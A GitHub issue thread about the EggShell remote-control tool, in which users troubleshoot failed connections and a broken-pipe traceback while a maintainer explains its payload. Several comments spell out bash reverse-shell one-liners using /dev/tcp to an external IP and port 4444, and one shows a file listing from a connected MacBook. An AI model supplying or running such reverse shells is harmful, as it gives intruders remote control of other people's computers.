### ISSUE TITLE
Problem while receive connection from client

### ISSUE THREAD

**Issue by ShellBear** [neoneggplant/EggShell#42]
I'm using the last version but here it's my problem ervytime a client connect : 
SET LHOST (Leave blank for 192.168.1.**)>
[*]  LHOST = 192.168.1.**
SET LPORT (Leave blank for 4444)>
[*]  LPORT = 4444
[*]  Listening on port 4444...
[*]  Connecting to 82.***.***.***
[*]  device unrecognized
bash: no job control in this shell

[*]  closing connection

**Comment by ShellBear** [comment]
For info the client is a Macbook Pro 2008 running probably last osx version

**Comment by neoneggplant** [comment]
what payload are you using? it looks like a reverse bash shell and not an eggshell payload

**Comment by ShellBear** [comment]
I used this script : while true;do bash -i >& /dev/tcp/90.39.132.99/4444 0>&1;sleep 5;done

**Comment by ShellBear** [comment]
Is it the problem ?

**Comment by ShellBear** [comment]
I configured it to works over lan with my external ip

**Comment by neoneggplant** [comment]
you need to use the payload creation option in eggshell

**Comment by neoneggplant** [comment]
it will look something like this
bash &> /dev/tcp/(external IP)/4444 0>&1

**Comment by ShellBear** [comment]
ok thank you. Problem resolved but now i have this error. I put you an example.

test@test's MacBook> ls
total 18
4983        384   2017-03-29 16:51:18  test          .bash_history
7           256   2015-11-28 22:53:54  test          .CFUserTextEncoding
102         448   2015-11-30 22:47:43  test          .cups
340         448   2016-04-18 18:40:19  test          .dropbox
14340       420   2017-03-29 16:36:37  test          .DS_Store
102         493   2017-03-28 16:09:02  test          .eggshell
136         493   2017-03-27 19:03:11  test          .icloud
102         493   2017-03-29 16:36:30  test          .icloudd
170         448   2017-03-28 16:05:54  test          .Trash
170         448   2017-03-04 15:15:10  test          Applications
1054        448   2017-03-27 18:18:58  test          Desktop
646         448   2017-03-23 18:25:04  test          Documents
5168        448   2017-03-29 16:36:22  test          Downloads
2006        448   2017-03-05 19:46:48  test          Library
340         448   2017-03-26 18:24:49  test          Movies
170         448   2016-11-14 01:20:10  test          Music
272         448   2017-03-19 10:26:01  test          Pictures
170         493   2015-11-02 16:12:49  test          Public
test@test's MacBook> cd Pictures
test@test's MacBook> pwd
/Users/test/Pictures
test@test's MacBook> ls
something went wrong
test@test's MacBook> ls
something went wrong
test@test's MacBook> ls
Traceback (most recent call last):
  File "eggshell.py", line 108, in <module>
    main()
  File "eggshell.py", line 104, in main
    menu()
  File "eggshell.py", line 55, in menu
    choose[option]()
  File "eggshell.py", line 86, in menuStartServer
    server.singleServer(sp[0],sp[1])
  File "/Users/shellbear/EggShell/modules/server/server.py", line 136, in singleServer
    if session and self.shell.interact(session,self) == -1:
  File "/Users/shellbear/EggShell/modules/shell/shell.py", line 152, in interact
    result = server.sendCommand(command,arg,cmdtype,session.conn)
  File "/Users/shellbear/EggShell/modules/server/server.py", line 275, in sendCommand
    conn.send(self.packcommand(cmd,args,type,terminator))
socket.error: [Errno 32] Broken pipe
➜  eggshell git:(master) ✗ 


When i try to ls in a folder i have this issue.

**Comment by no-name97** [comment]
When I create the payload where can I find it to put to my iPhone that I want to test one it .
It gave me this directory 
&>/dev/tcp/(local host ):4444 0>&1
But there is no like this directory just /dev/.
So where can I find the payload to start the listener ?

**Comment by neoneggplant** [comment]
that is the payload, its that one line of bash @no-name97
